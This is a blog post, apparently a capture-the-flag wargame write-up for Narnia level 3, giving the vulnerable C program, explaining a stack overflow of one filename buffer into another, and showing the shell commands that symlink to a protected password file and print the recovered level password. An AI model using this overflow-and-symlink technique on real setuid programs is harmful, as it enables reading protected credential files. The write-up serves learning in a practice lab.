Narnia: Level 3

We all have to start somewhere

Posted on May 10, 2017, 6:51 p.m.

Level 3 requires significantly less knowledge of the x86 stack than the previous level.

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];

        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }

        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }

        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

        /* close 'em */
        close(ifd);
        close(ofd);

        exit(1);
}

The vulnerability here is caused by no length checking when copying argv[1] to ifile. Since ifile is defined just after ofile in the source code, ifile will appear just before ofile on the stack. Hence, the plan will be to overflow ifile into ofile so that both ifile and ofile are files that we control. We will also create a symbolic link from ifile to /etc/narnia_pass/narnia4 so that the password is written out to ofile.

narnia3@melinda:~$ mkdir -p /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison
narnia3@melinda:~$ touch /tmp/laddison/a
narnia3@melinda:~$ ln -s /etc/narnia_pass/narnia4 /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a
narnia3@melinda:~$ /narnia/narnia3 /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a
copied contents of /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a to a safer place... (/tmp/laddison/a)
narnia3@melinda:~$ cat /tmp/laddison/a
thaenohtai
?~???4???????}0,narnia3@melinda:~$

Comments


Latest Posts


Archive

2017

Categories